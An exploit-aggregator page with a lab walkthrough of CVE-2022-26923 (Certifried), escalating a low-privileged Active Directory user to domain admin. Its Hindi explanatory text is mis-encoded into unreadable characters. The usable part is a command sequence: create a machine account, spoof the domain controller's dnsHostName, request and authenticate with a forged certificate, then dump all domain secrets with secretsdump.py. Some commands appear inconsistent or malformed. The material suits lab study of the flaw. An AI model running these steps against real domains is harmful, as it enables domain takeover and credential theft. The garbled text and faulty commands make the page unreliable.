Sploitus

Exploit for CVE-2022-26923

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN181 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GH-BADR-CVE-2022-26923
# CVE-2022-26923

## рд╡рд┐рд╡рд░рдг

рдпрд╣ рднреЗрджреНрдпрддрд╛ рдПрдХ рдирд┐рдореНрди-рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ Active Directory Certificate Services (AD CS) рд╕рд░реНрд╡рд░ рднреВрдорд┐рдХрд╛ рд╕реНрдерд╛рдкрд┐рдд рдбрд┐рдлрд╝реЙрд▓реНрдЯ Active Directory рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред

рдпрд╣ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ Active Directory Certificate Services (AD CS) рднреВрдорд┐рдХрд╛ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реИред AD CS рднреВрдорд┐рдХрд╛ рдПрдХ Windows Server рднреВрдорд┐рдХрд╛ рд╣реИ рдЬреЛ рдЖрдкрдХреЛ рдЕрдкрдиреЗ рд╕рдВрдЧрдарди рдХреЗ рд▓рд┐рдП рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдВрдЬреА рдЕрд╡рд╕рдВрд░рдЪрдирд╛ (PKI) рдмрдирд╛рдиреЗ рддрдерд╛ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдВрдЬреА рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлреА, рдбрд┐рдЬрд┐рдЯрд▓ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдФрд░ рдбрд┐рдЬрд┐рдЯрд▓ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдХреНрд╖рдорддрд╛рдПрдБ рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред AD CS рднреВрдорд┐рдХрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ, рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдФрд░ рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЬрд╛рд░реА рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред

## рд╡рд┐рд╖рдп-рд╕реВрдЪреА

  * CVE-2022-26923
    * рд╡рд┐рд╡рд░рдг
    * рд╡рд┐рд╖рдп-рд╕реВрдЪреА
    * рдкреВрд░реНрд╡рд╛рдкреЗрдХреНрд╖рд╛рдПрдБ
    * рдкрд░реНрдпрд╛рд╡рд░рдг
    * рд╢реЛрд╖рдг
    * рдЕрд╡рдзрд╛рд░рдгрд╛ рдХрд╛ рдкреНрд░рдорд╛рдг
    * рд╕рдВрджрд░реНрдн



## рдкреВрд░реНрд╡рд╛рдкреЗрдХреНрд╖рд╛рдПрдБ

  * Vagrant
  * VirtualBox



## рдкрд░реНрдпрд╛рд╡рд░рдг

рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЧрдпрд╛ Windows Server рд╕рдВрд╕реНрдХрд░рдг **Windows Server 2019** Standard Evaluation рд╣реИ, рдЬреЛ рднреЗрджреНрдп рд╕рдВрд╕реНрдХрд░рдг рд╣реИред рдкреНрд░рджрд╛рди рдХреА рдЧрдИ Vagrantfile (Vulnerable Machine рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ) рдПрдХ Windows Server 2019 VM рдмрдирд╛рдПрдЧреА рдЬрд┐рд╕рдореЗрдВ AD CS рднреВрдорд┐рдХрд╛ рд╕реНрдерд╛рдкрд┐рдд рдФрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХреА рдЧрдИ рд╣реИ, рд╕рд╛рде рд╣реА рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рд╡рд╛рд▓рд╛ рдПрдХ рдирд┐рдореНрди-рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рднреА:

  * рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо: `user`
  * рдкрд╛рд╕рд╡рд░реНрдб: `V@grant1`



рдкрд░реНрдпрд╛рд╡рд░рдг рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдЗрди рдЪрд░рдгреЛрдВ рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВ:

  * рдкрд╣рд▓реЗ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдХреЛ рдХреНрд▓реЛрди рдХрд░реЗрдВ рдФрд░ `CVE-2022-26923` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рдЬрд╛рдПрдБ: 

root@kitploit:~
        
        git clone https://github.com/Gh-Badr/CVE-2022-26923
        cd CVE-2022-26923
        

  * рдпрджрд┐ рдЖрдкрдХреЛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ IP рдкрддрд╛ рдмрджрд▓рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рддреЛ рдЖрдк `Vagrantfile` рдореЗрдВ рдирд┐рдореНрди рдкрдВрдХреНрддрд┐ рдореЗрдВ IP рдкрддреЗ рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдХреЗ рдРрд╕рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: 

root@kitploit:~
        
        config.vm.network "private_network", type: "static", ip: "192.168.33.13"
        

  * рдлрд┐рд░ VM рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ: 

root@kitploit:~
        
        cd 'Vulnerable Machine'
        vagrant up
        

  * рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ `certipy` рд╕реНрдерд╛рдкрд┐рдд рд▓рд┐рдирдХреНрд╕ рдорд╢реАрди рдирд╣реАрдВ рд╣реИ, рддреЛ рдЖрдк рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ `Attacker Machine` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рдкреНрд░рджрд╛рди рдХреА рдЧрдИ vagrant рдорд╢реАрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: 

root@kitploit:~
        
        cd 'Attacker Machine'
        vagrant up
        




`Attacker Machine` рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдПрдХ vagrant рдорд╢реАрди рдХреЗ рд╕рд╛рде рдПрдХ рд╢реЗрд▓ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╢рд╛рдорд┐рд▓ рд╣реИ рдЬреЛ `certipy` рдХрд╛ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдЧреАред рдЖрдк рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдЕрдкрдиреА рд▓рд┐рдирдХреНрд╕ рдорд╢реАрди рдкрд░ `certipy` рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рднреА рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

## рд╢реЛрд╖рдг

рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, `Attacker Machine` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реЗ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ:

root@kitploit:~
    
    
    vagrant ssh
    

рдЕрдм рдЬрдм рдЖрдк рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рдореЗрдВ рд╣реИрдВ, рддреЛ рдЖрдкрдХреЛ Windows Server рдХрд╛ IP рдкрддрд╛ `hosts` рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЬреЛрдбрд╝рдирд╛ рд╣реЛрдЧрд╛:

root@kitploit:~
    
    
    echo "192.168.33.13   VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts
    

**рдиреЛрдЯ** : рдпрджрд┐ рдЖрдкрдиреЗ рднреЗрджреНрдп рдорд╢реАрди рдХреА `Vagrantfile` рдореЗрдВ IP рдкрддрд╛ рдмрджрд▓рд╛ рд╣реИ, рддреЛ рдЖрдкрдХреЛ рдЗрд╕реЗ рдпрд╣рд╛рдБ рднреА рдмрджрд▓рдирд╛ рд╣реЛрдЧрд╛ред

рдлрд┐рд░, рдбреЛрдореЗрди рдореЗрдВ рдПрдХ рдирдпрд╛ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рдмрдирд╛рддреЗ рд╣реИрдВ:

root@kitploit:~
    
    
    addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'
    

рдпрд╣ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рдмрди рдЧрдпрд╛ рд╣реИ, `Vulnerable Machine` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реЗ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ `user` рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб `V@grant1` рдХреЗ рд╕рд╛рде рднреЗрджреНрдп рдорд╢реАрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░реЗрдВ:

root@kitploit:~
    
    
    vagrant ssh
    

рдлрд┐рд░, рдпрд╣ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рдмрди рдЧрдпрд╛ рд╣реИ, рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ:

root@kitploit:~
    
    
    Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName
    

рдЗрд╕ рдорд╢реАрди рдЦрд╛рддреЗ рдХрд╛ dnsHostName `CVEPC.vagrant.local` рд╣реИред рд╣рдо рдЗрд╕ dnsHostName рдХреЛ `VAGRANT-K51B6U3.vagrant.local` рдореЗрдВ рдмрджрд▓рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдЬреЛ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рд╣реИред

рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рдкрд╣рд▓реЗ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддреЗ `CVEPC` рд╕реЗ Service Principal Name (SPN) рд╣рдЯрд╛рдирд╛ рд╣реЛрдЧрд╛:

root@kitploit:~
    
    
    Set-ADComputer CVEPC -Properties ServicePrincipalName @{}
    

рдлрд┐рд░ рд╣рдо рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ dnsHostName рдХреЛ `VAGRANT-K51B6U3.vagrant.local` рдореЗрдВ рдмрджрд▓ рд╕рдХрддреЗ рд╣реИрдВ:

root@kitploit:~
    
    
    Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
    

  * рдиреЛрдЯ: рдпрд╣ рд╕рдордЭрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рд╣рдореЗрдВ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддреЗ рдХрд╛ SPN рдХреНрдпреЛрдВ рд╣рдЯрд╛рдирд╛ рдкрдбрд╝рд╛, рдЖрдк рдкреНрд░реЛрдЬреЗрдХреНрдЯ рд░рд┐рдкреЛрд░реНрдЯ (**рдлреНрд░реЗрдВрдЪ рдореЗрдВ**) рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╛ рдЖрдк рд╕рдВрджрд░реНрдн рдЕрдиреБрднрд╛рдЧ рдореЗрдВ рдкрд╣рд▓рд╛ рд▓реЗрдЦ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ CVE рдХреЗ рд▓реЗрдЦрдХ рджреНрд╡рд╛рд░рд╛ рд╡рд┐рд╕реНрддреГрдд рд╡рд┐рд╡рд░рдг рджрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред



рдЕрдм рдЬрдм рд╣рдорд╛рд░реЗ рдкрд╛рд╕ dnsHostName `VAGRANT-K51B6U3.vagrant.local` рд╡рд╛рд▓рд╛ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рд╣реИ, рддреЛ рд╣рдо рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рдкрд░ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ рднреЗрджреНрдп рдорд╢реАрди рд╕реЗ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

root@kitploit:~
    
    
    certipy req -username 'some-email@example.com' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local
    

рдЖрдкрдХреЛ рд╡рд░реНрддрдорд╛рди рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ `vagrant-k51b6u3.pfx` рдирд╛рдордХ рдПрдХ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдорд┐рд▓рдирд╛ рдЪрд╛рд╣рд┐рдПред рдпрд╣ рдЬрд╛рдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдорд╛рдиреНрдп рд╣реИ, рдЖрдк рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ `certipy` рдХреЗ `auth` рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:

root@kitploit:~
    
    
    certipy auth -pfx vagrant-k51b6u3.pfx
    

рдпрджрд┐ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдорд╛рдиреНрдп рд╣реИ, рддреЛ рдЖрдкрдХреЛ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рдХрд╛ NTLM рд╣реИрд╢ рдорд┐рд▓рдирд╛ рдЪрд╛рд╣рд┐рдПред рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрдИ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рддрд░реАрдХреЛрдВ рд╕реЗ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

## рдЕрд╡рдзрд╛рд░рдгрд╛ рдХрд╛ рдкреНрд░рдорд╛рдг

рдЕрд╡рдзрд╛рд░рдгрд╛ рдХреЗ рдкреНрд░рдорд╛рдг рдХреЗ рд░реВрдк рдореЗрдВ, рд╣рдо рдбреЛрдореЗрди рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╕рднреА рд░рд╣рд╕реНрдпреЛрдВ рдХреЛ рдкреБрдирдГ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП NTLM рд╣реИрд╢ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдЬреИрд╕рд╛ рдХрд┐ CVE рдХреЗ рд▓реЗрдЦрдХ рдХреЗ рд▓реЗрдЦ рдореЗрдВ рд╕рдордЭрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ)ред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдо impacket рд╕реВрдЯ рд╕реЗ `secretsdump.py` рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдЬреЛ `certipy` рдХреЗ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рдХреЗ рд╕рд╛рде рд╕реНрдерд╛рдкрд┐рдд рд╣реЛрддрд╛ рд╣реИ)ред

рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ:

root@kitploit:~
    
    
    secretsdump.py 'vagrant.local/some-email@example.com' -hashes :<NTLM hash>
    

`<NTLM hash>` рдХреЛ рдкрд┐рдЫрд▓реЗ рдЪрд░рдг рд╕реЗ рдкреНрд░рд╛рдкреНрдд NTLM рд╣реИрд╢ рд╕реЗ рдмрджрд▓реЗрдВред

рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк, рдЖрдкрдХреЛ рдбреЛрдореЗрди рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╕рднреА рд░рд╣рд╕реНрдп рдорд┐рд▓ рдЬрд╛рдиреЗ рдЪрд╛рд╣рд┐рдПред

## рд╕рдВрджрд░реНрдн

  * Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)
  * GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services
  * Try Hack Me - CVE-2022-26923